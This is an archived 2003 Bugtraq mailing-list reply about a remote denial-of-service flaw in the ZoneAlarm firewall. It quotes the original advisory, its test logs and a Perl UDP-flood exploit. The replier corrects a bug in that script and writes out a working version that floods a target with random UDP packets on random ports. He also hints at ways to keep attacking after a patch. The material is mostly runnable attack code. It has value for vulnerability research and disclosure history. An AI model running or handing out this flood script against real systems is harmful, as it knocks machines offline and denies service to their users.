Re: ZoneAlarm remote Denial Of Service exploit

To: _6mO_HaCk <hackologyteam@xxxxxxxxx>
Subject: Re: ZoneAlarm remote Denial Of Service exploit
From: Igor <sprog@xxxxxxxxx>
Date: Wed, 3 Sep 2003 17:46:36 +0400
In-reply-to: <20030902145734.2258.qmail@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: ROL
References: <20030902145734.2258.qmail@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
Reply-to: Igor Franchuk <sprog@xxxxxxxxx>

Hello _6mO_HaCk,

First of all thank you for this useful discovery.

> for (;;) {
>  $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
> $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
> $rand x $rand;
>  $port=int(rand 65000) +1;
>  send(DoS, 0, $size, sockaddr_in($port, $iaddr));
> }

You're always sending 0 on random ports. Actually it doesn't matter
what you send but valid packets are taking vsmon more time to
handle.

The string:

 send(DoS, 0, $size, sockaddr_in($port, $iaddr));

is not what you have meant and only works in your case since $size is
always zero. Luck. Anyway the whole 'random' traffic is zero out
there... and why use 'my' if you don't use 'strict'?

send SOCKET,MSG,FLAGS,TO
send SOCKET,MSG,FLAGS

I think what you wanted to write was this:

---ZAD---

#!/usr/bin/perl
use Socket;

print <<Msg;
--- ZoneAlarm Remote DoS Xploit
---
--- Discovered & Coded By _6mO_HaCk
Msg
;

$target = $ARGV[0];
print("\n\n[*] Usage : perl $0 <Target>\n\n"),exit  if(!$target);

inet_aton($target) || die ("[-] Unable to resolve $target");
socket(DoS, PF_INET, SOCK_DGRAM, (getprotobyname('udp'))[2]);
$iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
  $msg=(chr(int(rand(255))) x int(rand(10)) x int(rand(20)) x int(rand(30)));
  $port=int(rand 65000) +1;
  send(DoS,$msg,0, sockaddr_in($port, $iaddr));
}
---End ZAD---


Honestly I didn't expect this from ZoneLabs, it is so lame so awful
for firewall and it shows us all that ZoneLabs didn't test their
software. What firewall should be tested first on? On the speed of
random packets handling. There are two standard cases - UDP and TCP/IP.
You'd better ask some money out of ZoneLabs - you've done
their job.

It appears that Zone Alarm is responding differently on UDP packets content.
Some packets take vsmon more time to handle (So there is playground
for you when the update is released).

Well anyway if you reverse and take a look inside of zonealarm.exe you will
find out how good it is stuffed, after that both 60% slowdown and
nice loading time (it was improved though) won't amaze you any longer.

What you expect of a small and colorful ZoneAlarm when windows RPC
is programmed this way?



_> # Overview : 
_> #
_> # ZoneAlarm is a firewall software
_> # package designed for Microsoft Windows 
_> # operating systems that blocks intrusion 
_> # attempts, trusted by millions, and has 
_> # advanced privacy features like worms, 
_> # Trojan horses, and spyware protection. 
_> # ZoneAlarm is distributed and maintained 
_> # by Zone Labs.http://www.zonelabs.com
_> #
_> # Details :
_> #
_> # ZoneAlarm was found vulnerable to a
_> # serious vulnerability leading to a
_> # remote Denial Of Service condition due 
_> # to failure to handle udp random 
_> # packets, if an attacker sends multiple 
_> # udp packets to multiple ports 0-65000, 
_> # the machine will hang up until the
_> # attacker stop flooding. 
_> #
_> # The following is a remote test done 
_> # under ZoneAlarm version 3.7.202 running 
_> # on windows xp home edition.
_> #
_> # on irc test1 joined running ZoneAlarm
_> # version 3.7.202 with default
_> # installation
_> #
_> # * test1 (test@xxxxxxx***.**) has joined #Hackology
_> #
_> # from a linux box :
_> #
_> # [root@mail DoS]# ping 62.251.***.**
_> # PING 62.251.***.** (62.251.***.**) from 
_> # ***.***.**.** : 56(84) bytes of data.
_> #
_> # --- 62.251.***.** ping statistics ---
_> # 7 packets transmitted, 0 received, 100% 
_> # loss, time 6017ms
_> #
_> # on irc
_> #
# ->> [test1] PING
_> #
_> # [test1 PING reply]: 1secs
_> #
_> # Host is firewalled and up
_> #
_> # now lets try to dos
_> #
_> # --- ZoneAlarm Remote DoS Xploit
_> # ---
_> # --- Discovered & Coded By _6mO_HaCk
_> #
_> # [*] DoSing 62.251.***.** ... wait 1
_> # minute and then CTRL+C to stop
_> #
_> # [root@mail DoS]#
_> #
_> # after 2 minutes
_> #
_> # * test1 (test@xxxxxxx***.**) Quit (Ping timeout)
_> #
_> # I have made the same test on ZoneAlarm 
_> # Pro 4.0 Release running on windows xp
_> # professional and i've got the same 
_> # result.
_> #
_> # Exploit released : 02/09/03
_> #
_> # Vulnerable Versions : ALL
_> #
_> # Operating Systems : ALL Windows
_> #
_> # Successfully Tested on :
_> #
_> # ZoneAlarm version 3.7.202 / windows xp 
_> # home edition / windows 98.
_> #
_> # ZoneAlarm Pro 4.0 Release / windows xp 
_> # professional
_> #
_> # Vendor status : UNKOWN
_> #
_> # Solution : Shut down ZoneAlarm and wait 
_> # for an update.
_> #
_> # The following is a simple code written 
_> # in perl to demonstrate that, the code 
_> # is clean, it wont eat your cpu usage
_> # and it doesnt need to be run as root 
_> # but you still have to use it at your
_> # own risk and on your own machine or
_> # remotly after you get permission.
_> #
_> # Big thanx go to D|NOOO and frost for 
_> # providing me windows boxes with
_> # zonealarm for testing
_> #
_> # Greetz to ir7ioli, BlooDMASK
_> # Abderrahman@xxxxxxxxxx
_> # NRGY, Le_Ro| JT ghosted_ Securma,
_> # anasoft SySiPh, phrack, DeV|L0Ty, 
_> # MajNouN |BiG-LuV| h4ckg1rl and all 
_> # my ppl here in Chicago and in Morocco
_> #
_> # Comments suggestions or additional info 
_> # feel free to contact me at
_> # simo@xxxxxxxxxxxxxx
_> # _6mO_HaCk@xxxxxxxxxxxxx

_> #!/usr/bin/perl
_> use Socket;

_> system(clear);
_> print "\n";
_> print "--- ZoneAlarm Remote DoS Xploit\n";
_> print "---\n";
_> print "--- Discovered & Coded By _6mO_HaCk\n";
_> print "\n";
_> if(!defined($ARGV[0]))
_> {
_>    &usage
_> }

_> my ($target);
_>  $target=$ARGV[0];

_> my $ia       = inet_aton($target)          || die ("[-] Unable to resolve 
_> $target");

_> socket(DoS, PF_INET, SOCK_DGRAM, 17);
_>     $iaddr = inet_aton("$target");

_> print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

_> for (;;) {
_>  $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
_> $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
_> $rand x $rand;
_>  $port=int(rand 65000) +1;
_>  send(DoS, 0, $size, sockaddr_in($port, $iaddr));
_> }
_> sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}




-- 
Golden Telecom Software Department
Best regards,
 Igor                            mailto:sprog@xxxxxxxxx

Next by Date: Stunnel-3.x Daemon Hijacking
Next by thread: Re: ZoneAlarm remote Denial Of Service exploit
Index(es):
- Date
- Thread